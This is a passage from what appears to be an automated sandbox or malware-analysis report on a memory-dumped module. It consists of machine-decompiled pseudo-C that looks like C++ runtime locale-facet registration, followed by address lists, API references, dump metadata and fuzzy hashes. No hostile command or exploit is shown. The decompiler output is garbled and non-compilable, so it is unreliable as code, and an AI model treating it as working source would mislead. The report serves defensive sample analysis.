																																																	 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																																	 *(_t685 - 0x10) = _t665;
																																																	_t647 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216e4, _t646, _t665));
																																																	__eflags = _t647;
																																																	if(_t647 != 0) {
																																																		L110:
																																																		E6E18F30C(_t685 - 0x14);
																																																		return E6E1A9D88(_t647);
																																																	} else {
																																																		__eflags = _t665;
																																																		if(_t665 == 0) {
																																																			_push( *((intOrPtr*)(_t685 + 8)));
																																																			_push(_t685 - 0x10);
																																																			__eflags = E6E19B210(_t476, _t647, _t665) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E161CB5(__eflags);
																																																				asm("int3");
																																																				E6E1A9DBF(0x6e1ec3ec, _t476, _t647, _t665, 8);
																																																				E6E18F2A5(_t685 - 0x14, 0);
																																																				_t666 =  *0x6e221708; // 0x0
																																																				 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																																				 *(_t685 - 0x10) = _t666;
																																																				_t648 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e221698, _t647, _t666));
																																																				__eflags = _t648;
																																																				if(_t648 != 0) {
																																																					L117:
																																																					E6E18F30C(_t685 - 0x14);
																																																					return E6E1A9D88(_t648);
																																																				} else {
																																																					__eflags = _t666;
																																																					if(_t666 == 0) {
																																																						_push( *((intOrPtr*)(_t685 + 8)));
																																																						_push(_t685 - 0x10);
																																																						_t399 = E6E19B284(_t476, _t648, _t666);
																																																						_pop(_t578);
																																																						__eflags = _t399 - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E161CB5(__eflags);
																																																							asm("int3");
																																																							E6E1A9DBF(0x6e1ecb1a, _t476, _t648, _t666, 4);
																																																							_t667 = _t578;
																																																							 *(_t685 - 0x10) = _t667;
																																																							 *((intOrPtr*)(_t667 + 4)) =  *((intOrPtr*)(_t685 + 0xc));
																																																							_push( *((intOrPtr*)(_t685 + 0x14)));
																																																							_t211 = _t685 - 4;
																																																							 *_t211 =  *(_t685 - 4) & 0x00000000;
																																																							__eflags =  *_t211;
																																																							 *_t667 = 0x6e1f225c;
																																																							 *((char*)(_t667 + 0x28)) =  *((intOrPtr*)(_t685 + 0x10));
																																																							E6E19F3D8(_t476, _t578, _t630, _t648, _t667,  *_t211);
																																																							return E6E1A9D88(_t667,  *((intOrPtr*)(_t685 + 8)));
																																																						} else {
																																																							_t648 =  *(_t685 - 0x10);
																																																							 *(_t685 - 0x10) = _t648;
																																																							 *(_t685 - 4) = 1;
																																																							E6E1911C1(__eflags, _t648);
																																																							 *0x6e1ee1b4();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																																							 *0x6e221708 = _t648;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t648 = _t666;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t647 =  *(_t685 - 0x10);
																																																				 *(_t685 - 0x10) = _t647;
																																																				 *(_t685 - 4) = 1;
																																																				E6E1911C1(__eflags, _t647);
																																																				 *0x6e1ee1b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																																				 *0x6e221738 = _t647;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t647 = _t665;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t646 =  *(_t685 - 0x10);
																																																	 *(_t685 - 0x10) = _t646;
																																																	 *(_t685 - 4) = 1;
																																																	E6E1911C1(__eflags, _t646);
																																																	 *0x6e1ee1b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																																	 *0x6e221704 = _t646;
																																																	goto L103;
																																																}
																																															} else {
																																																_t646 = _t664;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t645 =  *(_t685 - 0x10);
																																														 *(_t685 - 0x10) = _t645;
																																														 *(_t685 - 4) = 1;
																																														E6E1911C1(__eflags, _t645);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																														 *0x6e221734 = _t645;
																																														goto L96;
																																													}
																																												} else {
																																													_t645 = _t663;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t644 =  *(_t685 - 0x10);
																																											 *(_t685 - 0x10) = _t644;
																																											 *(_t685 - 4) = 1;
																																											E6E1911C1(__eflags, _t644);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																											 *0x6e221718 = _t644;
																																											goto L89;
																																										}
																																									} else {
																																										_t644 = _t662;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t643 =  *(_t685 - 0x10);
																																								 *(_t685 - 0x10) = _t643;
																																								 *(_t685 - 4) = 1;
																																								E6E1911C1(__eflags, _t643);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																																								 *0x6e221714 = _t643;
																																								goto L82;
																																							}
																																						} else {
																																							_t643 = _t661;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t642 =  *(_t685 - 0x10);
																																					 *(_t685 - 0x10) = _t642;
																																					 *(_t685 - 4) = 1;
																																					E6E1911C1(__eflags, _t642);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																																					 *0x6e2216e8 = _t642;
																																					goto L75;
																																				}
																																			} else {
																																				_t642 = _t660;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t641 =  *(_t685 - 0x10);
																																		 *(_t685 - 0x10) = _t641;
																																		 *(_t685 - 4) = 1;
																																		E6E1911C1(__eflags, _t641);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																																		 *0x6e221710 = _t641;
																																		goto L68;
																																	}
																																} else {
																																	_t641 = _t659;
																																	goto L68;
																																}
																															}
																														} else {
																															_t640 =  *(_t685 - 0x10);
																															 *(_t685 - 0x10) = _t640;
																															 *(_t685 - 4) = 1;
																															E6E1911C1(__eflags, _t640);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																															 *0x6e2216fc = _t640;
																															goto L61;
																														}
																													} else {
																														_t640 = _t658;
																														goto L61;
																													}
																												}
																											} else {
																												_t639 =  *(_t685 - 0x10);
																												 *(_t685 - 0x10) = _t639;
																												 *(_t685 - 4) = 1;
																												E6E1911C1(__eflags, _t639);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																												 *0x6e221700 = _t639;
																												goto L54;
																											}
																										} else {
																											_t639 = _t657;
																											goto L54;
																										}
																									}
																								} else {
																									_t638 =  *(_t685 - 0x10);
																									 *(_t685 - 0x10) = _t638;
																									 *(_t685 - 4) = 1;
																									E6E1911C1(__eflags, _t638);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																									 *0x6e22172c = _t638;
																									goto L47;
																								}
																							} else {
																								_t638 = _t656;
																								goto L47;
																							}
																						}
																					} else {
																						_t637 =  *(_t685 - 0x10);
																						 *(_t685 - 0x10) = _t637;
																						 *(_t685 - 4) = 1;
																						E6E1911C1(__eflags, _t637);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
																						 *0x6e221730 = _t637;
																						goto L40;
																					}
																				} else {
																					_t637 = _t655;
																					goto L40;
																				}
																			}
																		} else {
																			_t636 =  *(_t685 - 0x10);
																			 *(_t685 - 0x10) = _t636;
																			 *(_t685 - 4) = 1;
																			E6E1911C1(__eflags, _t636);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
																			 *0x6e2216f8 = _t636;
																			goto L33;
																		}
																	} else {
																		_t636 = _t654;
																		goto L33;
																	}
																}
															} else {
																_t635 =  *(_t685 - 0x10);
																 *(_t685 - 0x10) = _t635;
																 *(_t685 - 4) = 1;
																E6E1911C1(__eflags, _t635);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
																 *0x6e221728 = _t635;
																goto L26;
															}
														} else {
															_t635 = _t653;
															goto L26;
														}
													}
												} else {
													_t634 =  *(_t685 - 0x10);
													 *(_t685 - 0x10) = _t634;
													 *(_t685 - 4) = 1;
													E6E1911C1(__eflags, _t634);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t634 + 4))))();
													 *0x6e2216f4 = _t634;
													goto L19;
												}
											} else {
												_t634 = _t652;
												goto L19;
											}
										}
									} else {
										_t633 =  *(_t685 - 0x10);
										 *(_t685 - 0x10) = _t633;
										 *(_t685 - 4) = 1;
										E6E1911C1(__eflags, _t633);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t633 + 4))))();
										 *0x6e221724 = _t633;
										goto L12;
									}
								} else {
									_t633 = _t651;
									goto L12;
								}
							}
						} else {
							_t632 =  *(_t685 - 0x10);
							 *(_t685 - 0x10) = _t632;
							 *(_t685 - 4) = 1;
							E6E1911C1(__eflags, _t632);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t632 + 4))))();
							 *0x6e2216f0 = _t632;
							goto L5;
						}
					} else {
						_t632 = _t650;
						goto L5;
					}
				}
			}

0x6e198f61
0x6e198f68
0x6e198f72
0x6e198f77
0x6e198f82
0x6e198f86
0x6e198f92
0x6e198f97
0x6e198f9b
0x6e198fe0
0x6e198fe3
0x6e198fef
0x6e198f9d
0x6e198f9f
0x6e198fa5
0x6e198fab
0x6e198fb3
0x6e198fb6
0x6e198ff0
0x6e198ff5
0x6e198ffd
0x6e199007
0x6e19900c
0x6e199017
0x6e19901b
0x6e19902c
0x6e19902e
0x6e199030
0x6e199075
0x6e199078
0x6e199084
0x6e199032
0x6e199032
0x6e199034
0x6e19903a
0x6e199040
0x6e199048
0x6e19904b
0x6e199085
0x6e19908a
0x6e199092
0x6e19909c
0x6e1990a1
0x6e1990ac
0x6e1990b0
0x6e1990c1
0x6e1990c3
0x6e1990c5
0x6e19910a
0x6e19910d
0x6e199119
0x6e1990c7
0x6e1990c7
0x6e1990c9
0x6e1990cf
0x6e1990d5
0x6e1990dd
0x6e1990e0
0x6e19911a
0x6e19911f
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199156
0x6e199158
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f

APIs

__EH_prolog3.LIBCMT ref: 6E198F68
std::_Lockit::_Lockit.LIBCPMT ref: 6E198F72

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E198FAC
std::_Facet_Register.LIBCPMT ref: 6E198FC3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198FE3
Concurrency::cancel_current_task.LIBCPMT ref: 6E198FF0

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: 6d96786f81671898f0fcfee713f0c8460df2bef22502acfaa80794c16d21dfbf
Instruction ID: 7df3ae128c0745ee1e005bdc67847355afb9dde7f10253f6837f3f8b7440b8fe
Opcode Fuzzy Hash: 6d96786f81671898f0fcfee713f0c8460df2bef22502acfaa80794c16d21dfbf
Instruction Fuzzy Hash: 2A01C4359005169FCB05DBE4C814AFE777A7F94754F240809E811AB2C0DF3099C8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198C78, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198C78(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t278;
				void* _t514;
				signed int _t743;
				void* _t810;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				void* _t880;

				_t810 = __edx;
				_t611 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t880 - 0x14, 0);
				_t835 =  *0x6e22173c; // 0x0
				 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
				 *(_t880 - 0x10) = _t835;
				_t278 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(__ebx, 0x6e221478, __edi, _t835));
				_t812 = _t278;
				if(_t278 != 0) {
					L5:
					E6E18F30C(_t880 - 0x14);
					return E6E1A9D88(_t812);
				} else {
					if(_t835 == 0) {
						_push( *((intOrPtr*)(_t880 + 8)));
						_push(_t880 - 0x10);
						__eflags = E6E19A8E9(__ebx, _t812, _t835) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t611, _t812, _t835, 8);
							E6E18F2A5(_t880 - 0x14, 0);
							_t836 =  *0x6e22171c; // 0x0
							 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
							 *(_t880 - 0x10) = _t836;
							_t813 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216c8, _t812, _t836));
							__eflags = _t813;
							if(_t813 != 0) {
								L12:
								E6E18F30C(_t880 - 0x14);
								return E6E1A9D88(_t813);
							} else {
								__eflags = _t836;
								if(_t836 == 0) {
									_push( *((intOrPtr*)(_t880 + 8)));
									_push(_t880 - 0x10);
									__eflags = E6E19A94F(_t611, _t810, _t813, _t836) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t611, _t813, _t836, 8);
										E6E18F2A5(_t880 - 0x14, 0);
										_t837 =  *0x6e2216ec; // 0x0
										 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
										 *(_t880 - 0x10) = _t837;
										_t814 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216a0, _t813, _t837));
										__eflags = _t814;
										if(_t814 != 0) {
											L19:
											E6E18F30C(_t880 - 0x14);
											return E6E1A9D88(_t814);
										} else {
											__eflags = _t837;
											if(_t837 == 0) {
												_push( *((intOrPtr*)(_t880 + 8)));
												_push(_t880 - 0x10);
												__eflags = E6E19A9F1(_t611, _t810, _t814, _t837) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t611, _t814, _t837, 8);
													E6E18F2A5(_t880 - 0x14, 0);
													_t838 =  *0x6e22170c; // 0x0
													 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
													 *(_t880 - 0x10) = _t838;
													_t815 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e221470, _t814, _t838));
													__eflags = _t815;
													if(_t815 != 0) {
														L26:
														E6E18F30C(_t880 - 0x14);
														return E6E1A9D88(_t815);
													} else {
														__eflags = _t838;
														if(_t838 == 0) {
															_push( *((intOrPtr*)(_t880 + 8)));
															_push(_t880 - 0x10);
															__eflags = E6E19AA93(_t611, _t815, _t838) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t611, _t815, _t838, 8);
																E6E18F2A5(_t880 - 0x14, 0);
																_t839 =  *0x6e221720; // 0x0
																 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																 *(_t880 - 0x10) = _t839;
																_t816 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216cc, _t815, _t839));
																__eflags = _t816;
																if(_t816 != 0) {
																	L33:
																	E6E18F30C(_t880 - 0x14);
																	return E6E1A9D88(_t816);
																} else {
																	__eflags = _t839;
																	if(_t839 == 0) {
																		_push( *((intOrPtr*)(_t880 + 8)));
																		_push(_t880 - 0x10);
																		__eflags = E6E19AB03(_t611, _t816, _t839) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t611, _t816, _t839, 8);
																			E6E18F2A5(_t880 - 0x14, 0);
																			_t840 =  *0x6e2216f0; // 0x0
																			 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																			 *(_t880 - 0x10) = _t840;
																			_t817 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216a4, _t816, _t840));
																			__eflags = _t817;
																			if(_t817 != 0) {
																				L40:
																				E6E18F30C(_t880 - 0x14);
																				return E6E1A9D88(_t817);
																			} else {
																				__eflags = _t840;
																				if(_t840 == 0) {
																					_push( *((intOrPtr*)(_t880 + 8)));
																					_push(_t880 - 0x10);
																					__eflags = E6E19AB6B(_t611, _t817, _t840) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t611, _t817, _t840, 8);
																						E6E18F2A5(_t880 - 0x14, 0);
																						_t841 =  *0x6e221724; // 0x0
																						 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																						 *(_t880 - 0x10) = _t841;
																						_t818 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216d0, _t817, _t841));
																						__eflags = _t818;
																						if(_t818 != 0) {
																							L47:
																							E6E18F30C(_t880 - 0x14);
																							return E6E1A9D88(_t818);
																						} else {
																							__eflags = _t841;
																							if(_t841 == 0) {
																								_push( *((intOrPtr*)(_t880 + 8)));
																								_push(_t880 - 0x10);
																								__eflags = E6E19ABD3(_t611, _t818, _t841) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t611, _t818, _t841, 8);
																									E6E18F2A5(_t880 - 0x14, 0);
																									_t842 =  *0x6e2216f4; // 0x0
																									 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																									 *(_t880 - 0x10) = _t842;
																									_t819 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216a8, _t818, _t842));
																									__eflags = _t819;
																									if(_t819 != 0) {
																										L54:
																										E6E18F30C(_t880 - 0x14);
																										return E6E1A9D88(_t819);
																									} else {
																										__eflags = _t842;
																										if(_t842 == 0) {
																											_push( *((intOrPtr*)(_t880 + 8)));
																											_push(_t880 - 0x10);
																											__eflags = E6E19AC3B(_t611, _t819, _t842) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t611, _t819, _t842, 8);
																												E6E18F2A5(_t880 - 0x14, 0);
																												_t843 =  *0x6e221728; // 0x0
																												 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																												 *(_t880 - 0x10) = _t843;
																												_t820 = E6E162171( *((intOrPtr*)(_t880 + 8)), E6E161F29(_t611, 0x6e2216d4, _t819, _t843));
																												__eflags = _t820;
																												if(_t820 != 0) {
																													L61:
																													E6E18F30C(_t880 - 0x14);
																													return E6E1A9D88(_t820);
																												} else {
																													__eflags = _t843;
																													if(_t843 == 0) {
																														_push( *((intOrPtr*)(_t880 + 8)));
																														_push(_t880 - 0x10);
																														__eflags = E6E19ACA3(_t611, _t820, _t843) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t611, _t820, _t843, 8);
																															E6E18F2A5(_t880 - 0x14, 0);
																															_t844 =  *0x6e2216f8; // 0x0
																															 *(_t880 - 4) =  *(_t880 - 4) & 0x00000000;
																															 *(_t880 - 0x10) = _t844;
